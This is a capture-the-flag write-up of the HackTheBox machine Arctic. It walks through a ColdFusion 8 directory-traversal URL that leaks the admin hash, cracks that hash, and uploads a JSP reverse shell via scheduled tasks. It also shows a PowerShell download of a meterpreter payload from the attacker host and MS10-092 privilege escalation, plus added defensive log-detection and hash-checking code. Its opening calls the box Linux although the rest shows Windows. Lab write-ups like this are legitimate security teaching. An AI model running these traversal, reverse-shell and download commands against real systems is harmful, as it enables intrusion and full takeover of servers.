TL;DR
This is a writeup on Arctic which is a Linux box categorized as easy on HackTheBox, and has Adobe’s ColdFusion as a primary service running on it. The exploitation essentially leverages enumeration and CVEs, namely Adobe ColdFusion – Directory Traversal & MS10_092. Interestingly, it does require us to escalate the user privileges for obtaining the root flag.
Walkthrough
Before we start, I want to let you know that this particular box, Arctic, on HackTheBox has got some serious latency issues. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, so as a result you might notice different IP addresses for the box in the included screenshots and commands.
Arctic Writeup: Scanning Network
Let’s start off by running an obvious nmap scan.
# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45
Nmap scan report for 10.129.150.85
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
So, the scan has returned 3 open ports: 135, 8500 and 49154. Among these, 135 & 49154 are running the basic RPC service. Let's first explore port 8500, as it seems interesting.
Arctic Writeup: Enumeration
Starting off with the browser view of port 8500.
We find two directories, namely CFIDE & cfdocs. Enumerating further with CFIDE/
We have plenty of files and directories in here. But administrator sounds worthy enough to be explored first.
Okay, so we have a login page of "ColdFusion 8" running here, with the username locked to admin.
You can check out this link to learn more about Adobe’s ColdFusion.
I also googled the changelog for ColdFusion 8 and found out that there was only a single sub-version of version 8, i.e. "ColdFusion v8.0.1". Thus, we can be sure that we are dealing with ColdFusion v8.0.1 here. It's always wise to do version enumeration; you never know where it may help you out.
I did try a few default passwords like "admin", "password", etc. but no luck with them. And I couldn't afford to brute-force my way in because this box took a freaking 30 seconds to respond to every request.
Arctic Writeup: Exploitation
So, better to search for some exploits available for ColdFusion 8.
I found this Directory Traversal exploit on ExploitDB.
Arctic Writeup: Using the Directory Traversal Exploit
Modifying the URL (as per the instructions in the exploit):
http://10.129.150.104:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
The exploit did work and revealed a password hash:
Password Hash-->
password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
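From the defensive side, the request above leaves a clear fingerprint in the web server access log. The following Python script is an added example (not from the writeup or from ColdFusion itself) that flags enter.cfm requests whose locale parameter contains traversal steps or a null byte, undoing nested percent-encoding first so that double-encoded variants are caught as well. The log lines it runs over are constructed samples in common log format, with the box's own locale URL reused as one of them.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not taken from the box); the second and
# third requests carry the locale traversal, the third one double-encoded.
SAMPLE_LOG = """\
10.10.14.52 - - [12/Mar/2021:10:01:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5321
10.10.14.52 - - [12/Mar/2021:10:01:40 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 612
10.10.14.52 - - [12/Mar/2021:10:02:11 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%252f..%252fColdFusion8%252flib%252fpassword.properties%2500en HTTP/1.1" 200 612
10.10.14.52 - - [12/Mar/2021:10:05:00 +0000] "GET /cfdocs/index.htm HTTP/1.1" 200 1024
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Strip repeated percent-encoding so %252e%252e%252f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_locale_traversal(target):
    """True when enter.cfm's locale parameter holds '..' path steps or a null byte."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/cfide/administrator/enter.cfm"):
        return False
    # parse_qs already decodes one layer; fully_decode handles the rest.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        value = fully_decode(raw).replace("\\", "/")
        if "../" in value or "\x00" in value:
            return True
    return False


def find_traversal_attempts(log_text):
    """Return (ip, timestamp, request target) for each matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_locale_traversal(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits
```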
Analyzing the password hash
Using a hash identifier website, I found out that the hash type is SHA1.
Further, trying a few websites for SHA1 hash decryption, I was able to decrypt the password hash using this site:
password = happyday
Great! Now, after trying the password obtained, we were logged in as "Administrator".
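As an added example (not code from the writeup), here is why that hash fell so quickly: ColdFusion 8 stores the administrator password as an unsalted SHA1, so any candidate can be checked offline with a single hash call. The script parses a constructed password.properties snippet carrying the hash shown above (the comment line is a placeholder) and verifies the recovered password against it.

```python
import hashlib

# Constructed sample in the password.properties key=value layout; the hash is
# the one shown in the writeup, the comment line is a placeholder.
SAMPLE_PROPERTIES = """\
#placeholder header line
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
"""


def parse_properties(text):
    """Parse Java-style key=value lines, skipping blanks and '#' comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def unsalted_sha1(candidate):
    """Plain SHA1 of the password, upper-case hex, no salt or iteration count."""
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest().upper()


def matching_candidate(stored_hash, candidates):
    """Return the first candidate whose SHA1 equals stored_hash, or None."""
    for candidate in candidates:
        if unsalted_sha1(candidate) == stored_hash.upper():
            return candidate
    return None


def verify_recovered_password(properties_text, candidates):
    """Look up the stored hash in a properties file and test the candidates."""
    stored = parse_properties(properties_text)["password"]
    return matching_candidate(stored, candidates)
```

A salted, iterated scheme (bcrypt, PBKDF2) would make the same wordlist check cost orders of magnitude more per candidate, which is the mitigation this step illustrates.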
Arctic Writeup: Getting a reverse shell
There are a hell of a lot of things to do here, but what's of use to us is the "Scheduling Tasks" service under the "Debugging & Logging" section, which ColdFusion offers and which allows us to upload files.
I will be creating a reverse shell in jsp using msfvenom, to upload.
Why jsp? It's because after I took a lil hint from the walkthroughs, I learnt that ColdFusion serves and runs jsp files.
Creating a jsp reverse shell using msfvenom (fill in the LHOST and LPORT values) –>
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp
Payload size: 1500 bytes
Let's copy this reverse shell file into our apache web server directory, i.e. /var/www/sheerazali.com/
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # cp shell.jsp /var/www/sheerazali.com/
and start the apache server on our machine.
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # service apache2 start
Checking the localhost webpage to ensure that we have the file "shell.jsp" hosted.
Now, let's schedule a task in ColdFusion to visit this "shell.jsp" file on our server and do the magic.
I will add the URL of our server where the "shell.jsp" file resides, i.e. http://10.10.14.52/shell.jsp and will also specify the destination path to save the file on the box, i.e. C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
Once the task is scheduled, run it!
It will take a while, and then give a message "This scheduled task was completed successfully."
Verifying that we have successfully uploaded "shell.jsp" to the CFIDE directory.
So, yes, shell.jsp is successfully uploaded.
Let's open up the listening port 8500 on our machine (as 8500 was the port we specified as LPORT in the shell.jsp).
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # nc -nlvp 8500
listening on [any] 8500 …
Let's now visit the URL to the "shell.jsp" file on the box: http://10.129.150.104:8500/CFIDE/shell.jsp
Yay! We have a reverse shell!
Arctic Writeup: User Flag
On running the command "whoami", we find out that the current user is "tolis".
Voilà! We have the user flag. Now we gotta escalate our privileges.
Arctic Writeup: Root Flag
Getting a reverse meterpreter shell
Now, because this is just a reverse shell, let us try getting a meterpreter session on the box.
Let's create a Windows reverse meterpreter shell using msfvenom –>
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
And copy it to the server directory to be able to host this file on the server.
┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ # cp met_shell.exe /var/www/sheerazali.com/
Now let's run this PowerShell command in the normal reverse shell we obtained earlier:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"
So, now we have "meterpreter.exe" on the box.
Let's use "exploit/multi/handler" on Metasploit.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.10.14.52
LHOST => 10.10.14.52
msf5 exploit(multi/handler) > set LPORT 8500
LPORT => 8500
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.52:8500
Now let's run the "meterpreter.exe" file on the box using our current shell.
And there we have our reverse meterpreter shell.
PS: We are running an x86 meterpreter session on an x64 box.
I also tried out the command "getsystem" to gain root, you know, just in case, but it didn't work lol.
Now, let's run the "local_exploit_suggester". This module basically suggests any exploits that the box is vulnerable to.
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > search suggest
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service
1 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
2 exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow
3 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
4 post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration
5 post/osx/manage/sonic_pi normal No OS X Manage Sonic Pi
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
OK, so we have some interesting results.
Also, because we are running an x86 meterpreter session on an x64 box, we should additionally try to migrate our meterpreter session into an x64 process and re-run the "local_exploit_suggester" module, as it may return different results.
Arctic Writeup: Migrating meterpreter shell
So, let's migrate our x86 meterpreter session into an x64 version.
Let's choose a process with x64 architecture.
I will be avoiding "powershell.exe", because using it may cause this process to die, and if "powershell.exe" dies our meterpreter session dies.
Let's use "jrun.exe" with "pid = 1140".
So, now we have successfully migrated into an x64 meterpreter session. Let's re-run the "local_exploit_suggester".
Comparing the two results from the x86 session and the x64 session, we can deduce that "exploit/windows/local/ms10_092_schelevator", which is ideal for escalating privileges, is common to both. Let's try the exploit "ms10_092".
Awesome! We are AUTHORITY\SYSTEM. Here's the root flag.
Until next box, check out other intriguing writeups here